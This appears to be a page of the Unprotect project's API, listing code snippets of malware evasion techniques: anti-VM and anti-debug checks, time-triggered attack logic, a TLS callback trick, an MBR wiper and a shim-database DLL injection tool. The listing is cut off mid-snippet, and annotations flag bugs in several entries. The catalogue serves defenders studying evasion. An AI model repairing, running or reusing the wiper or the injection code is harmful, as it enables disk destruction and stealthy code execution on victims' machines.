GET /api/snippets/?format=api&page=5
HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "count": 237,
    "next": null,
    "previous": "https://unprotect.it/api/snippets/?format=api&page=4",
    "results": [
        {
            "id": 38,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/134/?format=api",
            "description": "Warning: the code below is a simple MBR wiper that zeroes the first 512 bytes of PhysicalDrive0. It is deliberately kept non-operational: the bytes-written variable `write` passed to WriteFile is never declared and the CreateFile handle is never checked, so it does not compile as shown. Do not repair and run it outside a disposable VM.",
            "plain_code": "#include <Windows.h>\r\n#include <iostream>\r\n#include <ctime>\r\n#include <stdio.h>\r\n\r\n#define MBR_SIZE 512\r\n\r\nusing namespace std;\r\n\r\nint WipeMBR(void) {\r\n    char dmbr[MBR_SIZE];\r\n\r\n    ZeroMemory(&dmbr, sizeof(dmbr));\r\n    HANDLE disk = CreateFile((LPCSTR)\"\\\\\\\\.\\\\PhysicalDrive0\", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\r\n    WriteFile(disk, dmbr, MBR_SIZE, &write, NULL);\r\n    CloseHandle(disk);\r\n    return 0;\r\n}\r\n\r\nint main() {\r\n    cout << \"Start Wiping\" << endl;\r\n    WipeMBR();\r\n    return 0;\r\n}"
        },
        {
            "id": 35,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/21/?format=api",
            "description": "Original code available here: https://github.com/a0rtega/pafish/blob/master/pafish/cpu.c (cpuid_hv_bit reads the hypervisor-present bit, CPUID leaf 1 ECX bit 31; cpuid_hv_vendor_00 reads the vendor string from leaf 0x40000000). Note: this transcription differs from the original and will not compile as shown: the output-operand list in cpuid_hv_vendor_00 has stray colons, all three sprintf calls format ebx (the second and third should use ecx and edx, otherwise only the first four vendor bytes are correct), and the Parallels comment is opened with */ instead of /*.",
            "plain_code": "/* Check hypervisor presence bit */\r\nstatic inline int cpuid_hv_bit(){\r\n    int ecx;\r\n    __asm__ volatile(\"cpuid\" \\\r\n        : \"=c\"(ecx) \\\r\n        : \"a\"(0x01));\r\n    return (ecx>>31) & 0x1;\r\n}\r\n/* Get hypervisor name */\r\nstatic inline void cpuid_hv_vendor_00(char * vendor){\r\n    int ebx = 0, ecx = 0, edx = 0;\r\n    __asm__ volatile(\"cpuid\" \\\r\n        : \"=b\"(ebx), \\\r\n        : \"=c\"(ecx), \\\r\n        : \"=d\"(edx) \\\r\n        : \"a\"(0x40000000));\r\n    sprintf(vendor, \"%c%c%c%c\", ebx, (ebx>>8), (ebx>>16), (ebx>>24));\r\n    sprintf(vendor+4, \"%c%c%c%c\", ebx, (ebx>>8), (ebx>>16), (ebx>>24));\r\n    sprintf(vendor+8, \"%c%c%c%c\", ebx, (ebx>>8), (ebx>>16), (ebx>>24));\r\n    vendor[12] = 0x00;\r\n}\r\nvoid cpu_write_hv_vendor(char * vendor){\r\n    cpuid_hv_vendor_00(vendor);\r\n}\r\nint cpu_known_vm_vendors(){\r\n    const int count = 6;\r\n    int i;\r\n    char cpu_hv_vendor[13];\r\n    strings strs[count];\r\n    strs[0] = \"KVMKVMKVM\\0\\0\\0\"; /* KVM */\r\n    strs[1] = \"Microsoft Hv\"; /* Microsoft Hyper-V or Windows Virtual PC */\r\n    strs[2] = \"VMwareVMware\"; /* VMware */\r\n    strs[3] = \"XenVMMXenVMM\"; /* Xen */\r\n    strs[4] = \"prl hyperv\"; */ Parallels */\r\n    strs[5] = \"VBoxVBoxVBox\"; /* VirtualBox */\r\n    cpu_write_hv_vendor(cpu_hv_vendor);\r\n    for (i=0; i < count; i++){\r\n        if (!memcmp(cpu_hv_vendor,strs[i], 12)) return TRUE;\r\n    }\r\n    return FALSE;\r\n}"
        },
        {
            "id": 36,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/103/?format=api",
            "description": "This code snippet triggers the action once more than one day (time_attack_in_days) has elapsed since the build timestamp embedded via __DATE__/__TIME__. Note that the comparison relies on the host's current clock (time(NULL)), and the message in the else branch prints the total delay (time_to_wait) rather than the time remaining.",
            "plain_code": "#include <ctime>\r\n#include <iostream>\r\n#include <string>\r\n#include <sstream>\r\n\r\nconst double time_attack_in_days = 1.0;\r\n\r\nusing namespace std;\r\n\r\ntime_t time_when_compiled()\r\n{\r\n    string datestr = __DATE__;\r\n    string timestr = __TIME__;\r\n    istringstream iss_date(datestr);\r\n    string str_month;\r\n    int day;\r\n    int year;\r\n    iss_date >> str_month >> day >> year;\r\n\r\n    int month;\r\n    if      (str_month == \"Jan\") month = 1;\r\n    else if (str_month == \"Feb\") month = 2;\r\n    else if (str_month == \"Mar\") month = 3;\r\n    else if (str_month == \"Apr\") month = 4;\r\n    else if (str_month == \"May\") month = 5;\r\n    else if (str_month == \"Jun\") month = 6;\r\n    else if (str_month == \"Jul\") month = 7;\r\n    else if (str_month == \"Aug\") month = 8;\r\n    else if (str_month == \"Sep\") month = 9;\r\n    else if (str_month == \"Oct\") month = 10;\r\n    else if (str_month == \"Nov\") month = 11;\r\n    else if (str_month == \"Dec\") month = 12;\r\n    else exit(-1);\r\n\r\n    for(string::size_type pos = timestr.find(':'); pos != string::npos; pos = timestr.find(':', pos))\r\n    {\r\n    \ttimestr[pos] = ' ';\r\n    }\r\n\r\n    istringstream iss_time(timestr);\r\n    int hour, min, sec;\r\n    iss_time >> hour >> min >> sec;\r\n    tm t = {0};\r\n    t.tm_mon = month - 1;\r\n    t.tm_mday = day;\r\n    t.tm_year = year - 1900;\r\n    t.tm_hour = hour;\r\n    t.tm_min = min;\r\n    t.tm_sec = sec;\r\n\r\n    return mktime(&t);\r\n}\r\n\r\nint main()\r\n{\r\n    time_t current_time = time(NULL);\r\n    time_t build_time = time_when_compiled();\r\n\r\n    double diff_time = difftime(current_time, build_time);\r\n    const double time_to_wait = time_attack_in_days * 24.0 * 60.0 * 60.0;\r\n\r\n    // trigger the time of execution\r\n    if(diff_time > time_to_wait)\r\n    {\r\n        cout << \"Time of attack!\" << endl;\r\n        exit(-1);\r\n    }\r\n    else\r\n    {\r\n      
  cout << \"Time in second before running the attack: \" << time_to_wait << endl;\r\n    }\r\n\r\n    return 0;\r\n}"
        },
        {
            "id": 37,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/103/?format=api",
            "description": "Trigger the action depending on the weekday. Note: as written, `str == \"Monday\"` compares a char pointer against a string literal (pointer equality, not string equality; use strcmp), and \"Time of attack!\" is printed in the else branch, so the action runs on every day except Monday rather than on Monday.",
            "plain_code": "#include <Windows.h>\r\n#include <iostream>\r\n#include <ctime>\r\n#include <stdio.h>\r\n\r\nusing namespace std;\r\n\r\n// Trigger the action only on Monday\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n    time_t rawtime;\r\n    struct tm * timeinfo;\r\n    char buffer[100];\r\n\r\n    time(&rawtime);\r\n    timeinfo = localtime(&rawtime);\r\n\r\n    strftime(buffer, sizeof(buffer), \"%A\", timeinfo);\r\n\r\n    const char * str(buffer);\r\n\r\n    if (str == \"Monday\")\r\n    {\r\n        cout << \"Wait!\" << endl;\r\n        MessageBox(NULL, (LPSTR)str, (LPSTR)str, MB_OK);\r\n    }\r\n    else\r\n    {\r\n        cout << \"Time of attack!\" << endl;\r\n        MessageBox(NULL, (LPSTR)str, (LPSTR)str, MB_OK);\r\n    }\r\n    return 0;\r\n}"
        },
        {
            "id": 33,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 9,
                "username": "Glacius",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/Glacius___",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/63/?format=api",
            "description": "Resolves ZwQueryInformationProcess from ntdll.dll, obtains the PEB base address via ProcessBasicInformation, and tests the value at PEB+104 (0x68), the NtGlobalFlag field of the 32-bit PEB, to decide whether a debugger is attached. Note: the DWORD pointer arithmetic assumes a 32-bit process, the offset is applied with |= rather than +=, and the stored snippet is HTML-escaped (&lt; &quot; &amp;) and must be unescaped before compiling.",
            "plain_code": "#include &lt;Winternl.h&gt;\r\n#include &lt;Windows.h&gt;\r\n#include &lt;tchar.h&gt;\r\n#include &lt;stdio.h&gt;\r\n\r\n/*\r\n*Using ZwQueryInformationProcess we get the PEB Address and \r\n*then we check the NtGlobalFlag to determine the process is being debugged or not.\r\n*/\r\n\r\nint main() {\r\n     \r\n    typedef unsigned long(__stdcall *pfnZwQueryInformationProcess)\r\n    (\r\n        IN  HANDLE,\r\n        IN  unsigned int, \r\n        OUT PVOID, \r\n        IN  ULONG, \r\n        OUT PULONG\r\n    );\r\n    pfnZwQueryInformationProcess ZwQueryInfoProcess = NULL;\r\n     \r\n    HMODULE hNtDll = LoadLibrary(_T(&quot;ntdll.dll&quot;));\r\n    if (hNtDll == NULL) { }\r\n \r\n    ZwQueryInfoProcess = (pfnZwQueryInformationProcess) GetProcAddress(hNtDll,\r\n        &quot;ZwQueryInformationProcess&quot;);\r\n    if (ZwQueryInfoProcess == NULL) { }\r\n    unsigned long status;\r\n \r\n    DWORD pid = GetCurrentProcessId();\r\n    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);\r\n    PROCESS_BASIC_INFORMATION pbi;\r\n    status = ZwQueryInfoProcess(hProcess,\r\n                                ProcessBasicInformation,\r\n                                &amp;pbi,\r\n                                sizeof(pbi),\r\n                                NULL);\r\n                                 \r\n    PPEB peb_addr = pbi.PebBaseAddress;\r\n    DWORD ptr = pbi.PebBaseAddress;\r\n    ptr|=104;\r\n    DWORD *temp = ptr;\r\n    MessageBox(0, *temp ? &quot;Debugger found&quot; : &quot;Debugger not found&quot;,&quot;Status&quot;,0x30);\r\n     \r\n    return 0;\r\n}"
        },
        {
            "id": 34,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 5,
                "username": "fr0gger",
                "email": "thomas.roccia@securitybreak.io",
                "linkedin": "https://www.linkedin.com/in/thomas-roccia",
                "twitter": "https://twitter.com/fr0gger_",
                "website": "https://securitybreak.io",
                "github": "https://github.com/fr0gger"
            },
            "technique": "https://unprotect.it/api/techniques/69/?format=api",
            "description": "",
            "plain_code": "#include \"windows.h\"\r\n#include <stdio.h>\r\n\r\nvoid NTAPI __stdcall TLSCallbacks(PVOID DllHandle, DWORD dwReason, PVOID Reserved);\r\n\r\n#ifdef _M_IX86\r\n#pragma comment (linker, \"/INCLUDE:__tls_used\")\r\n#pragma comment (linker, \"/INCLUDE:__tls_callback\")\r\n#else\r\n#pragma comment (linker, \"/INCLUDE:_tls_used\")\r\n#pragma comment (linker, \"/INCLUDE:_tls_callback\")\r\n#endif\r\nEXTERN_C\r\n#ifdef _M_X64\r\n#pragma const_seg (\".CRT$XLB\")\r\nconst\r\n#else\r\n#pragma data_seg (\".CRT$XLB\")\r\n#endif\r\n\r\nPIMAGE_TLS_CALLBACK _tls_callback = TLSCallbacks;\r\n#pragma data_seg ()\r\n#pragma const_seg ()\r\n\r\nvoid NTAPI __stdcall TLSCallbacks(PVOID DllHandle, DWORD dwReason, PVOID Reserved)\r\n{\r\n\tMessageBox(nullptr, \"TLS Callback\", \"\", 0);\r\n\tExitProcess(0);\r\n}\r\n\r\nint main(int argc, char* argv[])\r\n{\r\n\tprintf(\"Main function!\");\r\n}"
        },
        {
            "id": 31,
            "language": {
                "id": 8,
                "label": "PowerShell",
                "code_class": "powershell"
            },
            "user": {
                "id": 9,
                "username": "Glacius",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/Glacius___",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/150/?format=api",
            "description": "If the query fails with \"MSAcpi_ThermalZoneTemperature not supported\", it suggests a virtualized environment; treat it as one indicator rather than proof, since the WMI class may also be unavailable on some physical hardware.\r\nReference : https://gist.github.com/teixeira0xfffff/36293713c254c69a7ba2353e8d64afce#file-msacpi_thermalzonetemperature-ps1",
            "plain_code": "function Get-AntiVMwithTemperature {\r\n    $t = Get-WmiObject MSAcpi_ThermalZoneTemperature -Namespace \"root/wmi\"\r\n    $valorTempKelvin = $t.CurrentTemperature / 10\r\n    $valorTempCelsius = $valorTempKelvin - 273.15\r\n    $valorTempFahrenheit = (9/5) * $valorTempCelsius + 32\r\n    return $valorTempCelsius.ToString() + \" C : \" + $valorTempFahrenheit.ToString() + \" F : \" + $valorTempKelvin + \"K\"  \r\n}"
        },
        {
            "id": 32,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 9,
                "username": "Glacius",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/Glacius___",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/53/?format=api",
            "description": "Queries CheckRemoteDebuggerPresent for the current process and terminates if a user-mode (ring-3) debugger is attached. Note: as written the if-statement tests the API's success/failure return value rather than the HasDebugPort output flag, so ExitProcess(0) runs whenever the call succeeds; the condition should be `CheckRemoteDebuggerPresent(GetCurrentProcess(), &HasDebugPort) && HasDebugPort`. The snippet also lacks the closing brace of main().",
            "plain_code": "#include \"windows.h\"\r\n \r\nint main(void)\r\n{\r\n    BOOL HasDebugPort = FALSE;\r\n \r\n    if (CheckRemoteDebuggerPresent(GetCurrentProcess(), &HasDebugPort))\r\n    {\r\n           ExitProcess(0); // Running in ring-3 debugger\r\n    }\r\n    // Running outside ring-3 debugger\r\n    return 0;"
        },
        {
            "id": 30,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/116/?format=api",
            "description": "",
            "plain_code": "/*\r\nSource: https://gist.github.com/w4kfu/95a87764db7029e03f09d78f7273c4f4\r\n-------- dllinjshim.cpp --------\r\n> cl /Fe:dllinjshim.exe dllinjshim.cpp\r\n> dllinjshim.exe\r\n> sdbinst moo.sdb\r\n/!\\ On Windows 10 there is a new function `SdbIsKnownShimDll` called \r\nin `SdbGetDllPath` which will check the DLL name against the following list:\r\n- \"AcGenral.dll\"\r\n- \"AcLayers.dll\"\r\n- \"AcRes.dll\"\r\n- \"AcSpecfc.dll\"\r\n- \"AcWinRT.dll\"\r\n- \"acwow64.dll\"\r\n- \"AcXtrnal.dll\"\r\n- \"KeyboardFilterShim.dll\"\r\n- \"MasterShim.dll\"\r\n- \"depdetct\"\r\n- \"uacdetct\"\r\n- \"luadgmgt.dll\"\r\n- \"luapriv.dll\"\r\n- \"EMET.dll\"\r\n- \"EMET64.dll\"\r\n- \"LogExts.dll\"\r\n- \"LogShim.dll\"\r\n------------------------------------\r\n*/\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n\r\n#define INJECTED_DLL_NAME   L\"moo.dll\"\r\n\r\n#define EXECUTABLE_NAME     L\"calc.exe\"\r\n#define OS_PLATFORM         4                   /* 0x1 : 32-bit ; 0x04 : 64-bit */\r\n\r\n\r\n#define TAGID_NULL          0\r\n\r\n#define TAG_TYPE_LIST       0x7000\r\n#define TAG_DATABASE        (0x1 | TAG_TYPE_LIST)\r\n#define TAG_LIBRARY         (0x2 | TAG_TYPE_LIST)\r\n#define TAG_INEXCLUDE       (0x3 | TAG_TYPE_LIST)\r\n#define TAG_SHIM            (0x4 | TAG_TYPE_LIST)\r\n#define TAG_EXE             (0x7 | TAG_TYPE_LIST)\r\n#define TAG_MATCHING_FILE   (0x8 | TAG_TYPE_LIST)\r\n#define TAG_SHIM_REF        (0x9 | TAG_TYPE_LIST)\r\n\r\n#define TAG_TYPE_DWORD      0x4000\r\n#define TAG_OS_PLATFORM     (0x23| TAG_TYPE_DWORD)\r\n\r\n#define TAG_TYPE_STRINGREF  0x6000\r\n#define TAG_NAME            (0x1 | TAG_TYPE_STRINGREF)\r\n#define TAG_MODULE          (0x3 | TAG_TYPE_STRINGREF)\r\n#define TAG_APP_NAME        (0x6 | TAG_TYPE_STRINGREF)\r\n#define TAG_DLLFILE         (0xA | TAG_TYPE_STRINGREF)\r\n\r\n#define TAG_TYPE_BINARY     0x9000\r\n#define TAG_EXE_ID          (0x4 | TAG_TYPE_BINARY)\r\n#define TAG_DATABASE_ID     (0x7 | 
TAG_TYPE_BINARY)\r\n\r\n#define TAG_TYPE_NULL       0x1000\r\n#define TAG_INCLUDE         (0x1 | TAG_TYPE_NULL)\r\n\r\ntypedef enum _PATH_TYPE {\r\n    DOS_PATH,\r\n    NT_PATH\r\n} PATH_TYPE;\r\n\r\ntypedef HANDLE PDB;\r\ntypedef DWORD TAG;\r\ntypedef DWORD INDEXID;\r\ntypedef DWORD TAGID;\r\n\r\ntypedef struct tagATTRINFO {\r\n    TAG  tAttrID;\r\n    DWORD dwFlags;\r\n    union {\r\n        ULONGLONG ullAttr;\r\n        DWORD   dwAttr;\r\n        TCHAR   *lpAttr;\r\n    };\r\n} ATTRINFO, *PATTRINFO;\r\n\r\ntypedef PDB (WINAPI *SdbCreateDatabasePtr)(LPCWSTR, PATH_TYPE);\r\ntypedef VOID (WINAPI *SdbCloseDatabaseWritePtr)(PDB);\r\ntypedef TAGID (WINAPI *SdbBeginWriteListTagPtr)(PDB, TAG);\r\ntypedef BOOL (WINAPI *SdbEndWriteListTagPtr)(PDB, TAGID);\r\ntypedef BOOL (WINAPI *SdbWriteStringTagPtr)(PDB, TAG, LPCWSTR);\r\ntypedef BOOL (WINAPI *SdbWriteDWORDTagPtr)(PDB, TAG, DWORD);\r\ntypedef BOOL (WINAPI *SdbWriteBinaryTagPtr)(PDB, TAG, PBYTE, DWORD);\r\ntypedef BOOL (WINAPI *SdbWriteNULLTagPtr)(PDB, TAG);\r\n\r\ntypedef struct _APPHELP_API {\r\n    SdbCreateDatabasePtr         SdbCreateDatabase;\r\n    SdbCloseDatabaseWritePtr     SdbCloseDatabaseWrite;\r\n    SdbBeginWriteListTagPtr      SdbBeginWriteListTag;\r\n    SdbEndWriteListTagPtr        SdbEndWriteListTag;\r\n    SdbWriteStringTagPtr         SdbWriteStringTag;\r\n    SdbWriteDWORDTagPtr          SdbWriteDWORDTag;\r\n    SdbWriteBinaryTagPtr         SdbWriteBinaryTag;\r\n    SdbWriteNULLTagPtr           SdbWriteNULLTag;\r\n} APPHELP_API, *PAPPHELP_API;\r\n\r\nBOOL static LoadAppHelpFunctions(HMODULE hAppHelp, PAPPHELP_API pAppHelp) {\r\n    if (!(pAppHelp->SdbBeginWriteListTag = (SdbBeginWriteListTagPtr)GetProcAddress(hAppHelp, \"SdbBeginWriteListTag\"))) {\r\n        fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbBeginWriteListTag\\\")\\n\");\r\n        return FALSE;\r\n    }\r\n    if (!(pAppHelp->SdbCloseDatabaseWrite = (SdbCloseDatabaseWritePtr)GetProcAddress(hAppHelp, \"SdbCloseDatabaseWrite\"))) {\r\n  
      fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbCloseDatabaseWrite\\\")\\n\");\r\n        return FALSE;\r\n    }\r\n    if (!(pAppHelp->SdbCreateDatabase = (SdbCreateDatabasePtr)GetProcAddress(hAppHelp, \"SdbCreateDatabase\"))) {\r\n        fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbCreateDatabase\\\")\\n\");\r\n        return FALSE;\r\n    }\r\n    if (!(pAppHelp->SdbEndWriteListTag = (SdbEndWriteListTagPtr)GetProcAddress(hAppHelp, \"SdbEndWriteListTag\"))) {\r\n        fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbEndWriteListTag\\\")\\n\");\r\n        return FALSE;\r\n    }\r\n    if (!(pAppHelp->SdbWriteBinaryTag = (SdbWriteBinaryTagPtr)GetProcAddress(hAppHelp, \"SdbWriteBinaryTag\"))) {\r\n        fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbWriteBinaryTag\\\")\\n\");\r\n        return FALSE;\r\n    }\r\n    if (!(pAppHelp->SdbWriteDWORDTag = (SdbWriteDWORDTagPtr)GetProcAddress(hAppHelp, \"SdbWriteDWORDTag\"))) {\r\n        fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbWriteDWORDTag\\\")\\n\");\r\n        return FALSE;\r\n    }\r\n    if (!(pAppHelp->SdbWriteStringTag = (SdbWriteStringTagPtr)GetProcAddress(hAppHelp, \"SdbWriteStringTag\"))) {\r\n        fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbWriteStringTag\\\")\\n\");\r\n        return FALSE;\r\n    }\r\n    if (!(pAppHelp->SdbWriteNULLTag = (SdbWriteNULLTagPtr)GetProcAddress(hAppHelp, \"SdbWriteNULLTag\"))) {\r\n        fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbWriteNULLTag\\\")\\n\");\r\n        return FALSE;\r\n    }\r\n    return TRUE;\r\n}\r\n\r\nBOOL static DoStuff(PAPPHELP_API pAppHelp)\r\n{\r\n    PDB db = NULL;\r\n    TAGID tIdDatabase;\r\n    TAGID tIdLibrary;\r\n    TAGID tIdShim;\r\n    TAGID tIdInexclude;\r\n    TAGID tIdExe;\r\n    TAGID tIdMatchingFile;\r\n    TAGID tIdShimRef;\r\n    \r\n    db = pAppHelp->SdbCreateDatabase(L\"moo.sdb\", DOS_PATH);\r\n    if (db == NULL) {\r\n        fprintf(stderr, \"[-] SdbCreateDatabase failed : %lu\\n\", 
GetLastError());\r\n        return FALSE;\r\n    }\r\n    tIdDatabase = pAppHelp->SdbBeginWriteListTag(db, TAG_DATABASE);\r\n    pAppHelp->SdbWriteDWORDTag(db, TAG_OS_PLATFORM, OS_PLATFORM);\r\n    pAppHelp->SdbWriteStringTag(db, TAG_NAME, L\"moo_Database\");\r\n    pAppHelp->SdbWriteBinaryTag(db, TAG_DATABASE_ID, \"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\", 0x10);\r\n    tIdLibrary = pAppHelp->SdbBeginWriteListTag(db, TAG_LIBRARY);\r\n    tIdShim = pAppHelp->SdbBeginWriteListTag(db, TAG_SHIM);\r\n    pAppHelp->SdbWriteStringTag(db, TAG_NAME, L\"moo_Shim\");\r\n    pAppHelp->SdbWriteStringTag(db, TAG_DLLFILE, INJECTED_DLL_NAME);\r\n    tIdInexclude = pAppHelp->SdbBeginWriteListTag(db, TAG_INEXCLUDE);\r\n    pAppHelp->SdbWriteNULLTag(db, TAG_INCLUDE);\r\n    pAppHelp->SdbWriteStringTag(db, TAG_MODULE, L\"*\");\r\n    pAppHelp->SdbEndWriteListTag(db, tIdInexclude);\r\n    pAppHelp->SdbEndWriteListTag(db, tIdShim);\r\n    pAppHelp->SdbEndWriteListTag(db, tIdLibrary);\r\n    tIdExe = pAppHelp->SdbBeginWriteListTag(db, TAG_EXE);\r\n    pAppHelp->SdbWriteStringTag(db, TAG_NAME, EXECUTABLE_NAME);\r\n    pAppHelp->SdbWriteStringTag(db, TAG_APP_NAME, L\"moo_Apps\");\r\n    pAppHelp->SdbWriteBinaryTag(db, TAG_EXE_ID, \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\", 0x10);\r\n    tIdMatchingFile = pAppHelp->SdbBeginWriteListTag(db, TAG_MATCHING_FILE);\r\n    pAppHelp->SdbWriteStringTag(db, TAG_NAME, L\"*\");\r\n    pAppHelp->SdbEndWriteListTag(db, tIdMatchingFile);\r\n    tIdShimRef = pAppHelp->SdbBeginWriteListTag(db, TAG_SHIM_REF);\r\n    pAppHelp->SdbWriteStringTag(db, TAG_NAME, L\"moo_Shim\");\r\n    pAppHelp->SdbEndWriteListTag(db, tIdShimRef);\r\n    pAppHelp->SdbEndWriteListTag(db, tIdExe);\r\n    pAppHelp->SdbEndWriteListTag(db, tIdDatabase);\r\n    pAppHelp->SdbCloseDatabaseWrite(db);\r\n    return TRUE;\r\n}\r\n\r\nint main(int argc, char *argv[]) {\r\n    APPHELP_API api = {0};\r\n    
HMODULE hAppHelp = NULL;\r\n    \r\n    hAppHelp = LoadLibraryA(\"apphelp.dll\");\r\n    if (hAppHelp == NULL) {\r\n        fprintf(stderr, \"[-] LoadLibrary failed %lu\\n\", GetLastError());\r\n        return 1;\r\n    }\r\n    if (LoadAppHelpFunctions(hAppHelp, &api) == FALSE) {\r\n        printf(\"[-] Failed to load apphelp api %lu!\\n\", GetLastError());\r\n        return 1;\r\n    }\r\n    DoStuff(&api);\r\n    return 0;\r\n}\r\nmoo.cpp\r\n/*\r\n-------- moo.cpp --------\r\n> cl /LD /Fe:moo.dll moo.cpp\r\n> copy moo.dll \"C:\\Windows\\AppPatch\\AppPatch64\\moo.dll\"\r\n-------------------------\r\n*/\r\n\r\n#define EXPORT_FUNC extern \"C\" __declspec(dllexport)\r\n\r\nEXPORT_FUNC int GetHookAPIs(PVOID a, PVOID b, PVOID c)\r\n{\r\n    return 0x01; \r\n}\r\n\r\nEXPORT_FUNC int NotifyShims(PVOID a, PVOID b)\r\n{\r\n    return 0x01; \r\n}\r\n\r\nBOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)\r\n{\r\n    UNREFERENCED_PARAMETER(hinstDLL);\r\n    UNREFERENCED_PARAMETER(lpReserved);\r\n\r\n    if (fdwReason == DLL_PROCESS_ATTACH) {\r\n        return TRUE;\r\n    }\r\n    return TRUE;\r\n}"
        },
        {
            "id": 27,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 5,
                "username": "fr0gger",
                "email": "thomas.roccia@securitybreak.io",
                "linkedin": "https://www.linkedin.com/in/thomas-roccia",
                "twitter": "https://twitter.com/fr0gger_",
                "website": "https://securitybreak.io",
                "github": "https://github.com/fr0gger"
            },
            "technique": "https://unprotect.it/api/techniques/149/?format=api",
            "description": "",
            "plain_code": "#include <iostream>\r\n#include <cstring>\r\n#include <windows.h>\r\n\r\nusing namespace std;\r\n\r\nint main(int argc, char** argv)\r\n{\r\n    TCHAR szExeFileName[MAX_PATH];\r\n    GetModuleFileName(NULL, szExeFileName, MAX_PATH);\r\n\r\n    // full path\r\n    cout << \"[+] Full Path: \" << szExeFileName << endl;\r\n\r\n    //convert tchar to string\r\n    std:string filename (szExeFileName);\r\n\r\n    // Remove directory if present.\r\n    const size_t last_slash_idx = filename.find_last_of(\"\\\\/\");\r\n    if (std::string::npos != last_slash_idx)\r\n    {\r\n        filename.erase(0, last_slash_idx + 1);\r\n    }\r\n\r\n    // Blacklist\r\n    LPSTR fname[] = {\"sample.exe\",\r\n                     \"malware.exe\",\r\n                     // ADD YOUR PROCESS NAME HERE!\r\n                    };\r\n    for (int i = 0; i < (sizeof(fname) / sizeof(LPSTR)); i++)\r\n    {\r\n        if ((fname[i] == filename ))\r\n        {\r\n            cout << \" [!] Filename is blacklisted: \" << (fname[i]) << endl;\r\n            exit(0);\r\n        }\r\n    }\r\n    return 0;\r\n}"
        },
        {
            "id": 28,
            "language": {
                "id": 1,
                "label": "Delphi",
                "code_class": "Delphi"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/55/?format=api",
            "description": "You can compile this code snippet as a classical Delphi Console Application.",
            "plain_code": "program ADB_NtSetInformationThread;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n  WinAPI.Windows, System.SysUtils;\r\n\r\ntype\r\n  // ntddk.h\r\n  TThreadInfoClass = (\r\n                        ThreadBasicInformation,\r\n                        ThreadTimes,\r\n                        ThreadPriority,\r\n                        ThreadBasePriority,\r\n                        ThreadAffinityMask,\r\n                        ThreadImpersonationToken,\r\n                        ThreadDescriptorTableEntry,\r\n                        ThreadEnableAlignmentFaultFixup,\r\n                        ThreadEventPair_Reusable,\r\n                        ThreadQuerySetWin32StartAddress,\r\n                        ThreadZeroTlsCell,\r\n                        ThreadPerformanceCount,\r\n                        ThreadAmILastThread,\r\n                        ThreadIdealProcessor,\r\n                        ThreadPriorityBoost,\r\n                        ThreadSetTlsArrayAddress,\r\n                        ThreadIsIoPending,\r\n                        ThreadHideFromDebugger, {<--}\r\n                        ThreadBreakOnTermination,\r\n                        ThreadSwitchLegacyState,\r\n                        ThreadIsTerminated,\r\n                    